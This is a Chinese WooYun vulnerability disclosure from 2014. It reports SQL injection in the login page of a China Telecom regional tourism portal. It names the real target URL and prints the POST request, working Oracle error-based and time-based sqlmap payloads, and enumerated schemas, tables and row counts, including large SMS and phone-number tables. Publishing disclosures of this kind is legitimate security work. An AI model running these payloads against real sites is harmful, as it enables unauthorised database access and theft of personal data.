当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082767

漏洞标题:中国电信某省级网站SQL注入(疑似影响千万数据)

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2014-11-11 15:27

修复时间:2014-12-26 15:28

公开时间:2014-12-26 15:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-11: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-26: 细节向公众公开

简要描述:

没错是千万
错是千万
是千万
千万

...

详细说明:

黑龙江电信数字旅游门户网站_后台管理维护
链接:http://www.gzbg100.cn/sysadmin/Login.aspx

16.jpg


登陆处存在注入,用户名密码输入',直接报错

17.jpg


验证码只会验证是否有效,不会过期
post请求

POST /sysadmin/Login.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.gzbg100.cn/sysadmin/Login.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.gzbg100.cn
Content-Length: 361
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=w0ctrju5zcbqdw55uiot0h45
__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJOTI4MjE5NjI1ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnBmGi4hqICb4u6KAz35K7NqMua7k%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBgKXyKGvBAKl1bKzCQKd%2B7qdDgKY2YWXBgKC3IeGDAKNt7ybCQwP4hOwri06ABc6B3P7yglAd%2FNk&txtUserName=aaa&txtPwd=aaa&txtCheckCode=6146&btnLogin.x=0&btnLogin.y=0


漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUserName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTI4MjE5NjI1D2QWAgIDD2QWAgIHDw9kFgIeB29uY2xpY2sFFHJldHVybiBjaGVja0lucHV0KCk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnB5/qvGwf8XhrP/uBSB+IpTzXwNU=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgLaxv3UCQKl1bKzCQKd+7qdDgKY2YWXBgKC3IeGDAKNt7ybCV7wzdzOvML8yuz7RZElCgc5cuOr&txtUserName=aaa' AND 7718=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(111)||CHR(103)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7718=7718) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(102)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'dHGr'='dHGr&txtPwd=aaa&txtCheckCode=0441&btnLogin.x=0&btnLogin.y=0
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTI4MjE5NjI1D2QWAgIDD2QWAgIHDw9kFgIeB29uY2xpY2sFFHJldHVybiBjaGVja0lucHV0KCk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnB5/qvGwf8XhrP/uBSB+IpTzXwNU=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgLaxv3UCQKl1bKzCQKd+7qdDgKY2YWXBgKC3IeGDAKNt7ybCV7wzdzOvML8yuz7RZElCgc5cuOr&txtUserName=aaa' AND 7855=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'uHrR'='uHrR&txtPwd=aaa&txtCheckCode=0441&btnLogin.x=0&btnLogin.y=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'SYSMANAGER'
current user is DBA: False
available databases [18]:
[*] COUPON
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSMANAGER
[*] SYSTEM
[*] TG
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SYSMANAGER
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| SMSSEND_BACK | 9966936 |
| SMS_APP_PHONES | 8387577 |
| TBCUSTCOUNT | 897976 |
| SMSSEND | 743361 |
| TBCOUPONCARD | 231471 |
| TB_GUEST_INFO | 177577 |
| TB_ADV_CLICK | 133270 |
| TEMP_SMS | 56955 |
| TB_COMMON_GUESTCOMMENT | 22868 |
| TB_SSOLOGS | 19428 |
| RESTINFO | 13752 |
| RESTPIC | 9474 |
| TB_LOGINFO | 8270 |
| TB_HDM_PICTURE | 3506 |
| TB_TLSUBPAGE_MAPTO_SCENIC | 884 |
| TB_DINING_BASICINFO | 694 |
| TB_TRAVEL_REGUSER | 663 |
| SMS_APP_MESSAGES | 609 |
| TBCOUPON | 595 |
| TB_TRAVEL_LINEPLAN | 528 |
| TB_KEYWORDS_FILTER | 525 |
| TB_NEWS_INFO | 454 |
| TB_SCENIC_INFO | 425 |
| TB_CODEDEFINE | 409 |
| TB_SCENIC_RESERVE | 332 |
| TB_AUTHORITY | 329 |
| TB_SCENIC_INFO_BAK_0528 | 318 |
| TB_COMPLAINT | 290 |
| TB_MARKET_INFO | 271 |
| TB_HOTEL_BASEINFO | 269 |
| TB_PLAY_BASEINFO | 261 |
| TB_PERFORMER_INFO | 242 |
| TBTERMINALTRAD | 228 |
| TB_USERROLE | 163 |
| TBMERCHANT | 157 |
| TB_SCENIC_BAK | 149 |
| TB_TRAVELINE_SUBPAGE_LEVEL2 | 149 |
| TB_ADV_INCOME | 141 |
| TB_TRAVEL_LINE | 132 |
| TB_ADV_DETAIL | 126 |
| TB_USERINFO | 124 |
| TB_ORDER_HOTEL | 115 |
| TB_VALIDCODE | 113 |
| TB_FUNCTIONS111 | 103 |
| TB_FUNCTIONSBAK | 103 |
| TB_FUNCTIONS | 92 |
| TB_RAFFLE | 60 |
| TB_ORDER_SCENIC | 55 |
| TB_TRAVEL_INFO | 48 |
| TB_BALANCE | 42 |
| TB_COMMON_PAGESETINFO | 40 |
| TBCATE | 40 |
| SMS_APP_USERINFO | 39 |
| TB_ADV_LIMIT | 34 |
| TB_ORDER_DINING | 34 |
| TB_ADV_INFO | 30 |
| TB_TRAVELINE_SUBPAGE_LEVEL1 | 28 |
| TB_ORDER_PLAY | 26 |
| MISSM_MESSAGE | 24 |
| TB_KNOWLEDGEBASE_INFO | 24 |
| TB_PAYLOG | 22 |
| TB_USR_INFO | 19 |
| TB_ROLES | 18 |
| TB_MISSMNEWS_INFO | 17 |
| TB_NEWS_COLUMN | 17 |
| TBCOUPOUORDER | 16 |
| TB_ORDER_LINE | 15 |
| TB_TRAVEL_BUSTYPE | 15 |
| TB_DINING_CUISINETYPE | 14 |
| TB_TRAVEL_GUIDE | 14 |
| TB_TRAVEL_INCOME | 14 |
| TB_AREA | 13 |
| TB_AREA_WEATHERURL | 13 |
| TB_BUSINESS_INFO | 13 |
| TB_TUAN_CITY | 13 |
| TB_TRAVEL_GROUP | 12 |
| TB_HOTEL_GROOMTYPE | 10 |
| TB_MOBILE_AREA | 10 |
| TB_MOBILE_VOUCHER | 10 |
| TB_MOBILE_CODEDEFINE | 9 |
| TB_CALENDAR | 8 |
| TB_MOBILE_SERVICE | 8 |
| TB_SHOPPING_SCENIC | 8 |
| TB_DEPARTMENT | 7 |
| TB_MOBILE_CATEGORY | 7 |
| TB_MOBILE_POSITION | 7 |
| TB_MOBILE_SPACE | 7 |
| TB_TUAN_DINGDAN | 7 |
| TB_FAVORITES | 6 |
| TB_MOBILE_COMPANY | 6 |
| TB_MOBILE_CUSTOMER | 6 |
| TMP_TESTORDER | 6 |
| TB_ADVANCE_BOOKING | 5 |
| TB_DINING_CUISINEINFO | 5 |
| TB_TRAVEL_BUSINFO | 5 |
| TBCOUPONUSER | 5 |
| TB_KNOWLEDGEBASE_TYPE | 4 |
| TB_MOBILE_PARAMETER | 4 |
| TB_MOBILE_PRODUCT | 4 |
| TB_PRIVILEGE | 4 |
| TB_TUAN_CODEDEFINE | 4 |
| TB_HOTEL_RESERVE | 3 |
| TB_MOBILE_BOOKING | 3 |
| TB_ORDER_THEMES | 3 |
| TB_SSOSITE | 3 |
| TB_TUAN_USER | 3 |
| TB_MOBILE_ADDRESS | 2 |
| TB_MOBILE_ALBUM | 2 |
| TB_MOBILE_MEDIA | 2 |
| TB_MOBILE_SESSION | 2 |
| TB_NEWS_TITLEPREV | 2 |
| TB_TUAN_USERRELATION | 2 |
| TB_BARCODE_CONFIG | 1 |
| TB_MOBILE_AROUND | 1 |
| TB_MOBILE_CAMERA | 1 |
| TB_MOBILE_CRITICAL | 1 |
| TB_MOBILE_DAILY | 1 |
| TB_MOBILE_LOCATION | 1 |
| TB_NEWS_CONTENTTEMPLATE | 1 |
| TB_ROLLINFO | 1 |
| TB_TUAN_BBS | 1 |
| TB_TUAN_PROJECTS | 1 |
| TB_VERSION | 1 |
+-----------------------------+---------+
Database: SYSMANAGER
Table: SMSSEND_BACK
[10 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| ADDDATE | DATE |
| CONTENT | VARCHAR2 |
| OUT_SMSID | NUMBER |
| PHONENUM | VARCHAR2 |
| SENDDATE | DATE |
| SENDNUM | VARCHAR2 |
| SENDRESULT | NUMBER |
| SENDSTATUS | NUMBER |
| SMSID | NUMBER |
| TYPE | NUMBER |
+------------+----------+
数据就不贴了~

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-11-14 17:46

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-11 16:48 | sec_jtn ( 普通白帽子 | Rank:134 漏洞数:56 | 本想无耻的刷rank,最后发现是我想太多了。...)

    你为什么这么吊这么好的日子不去约炮来乌云日站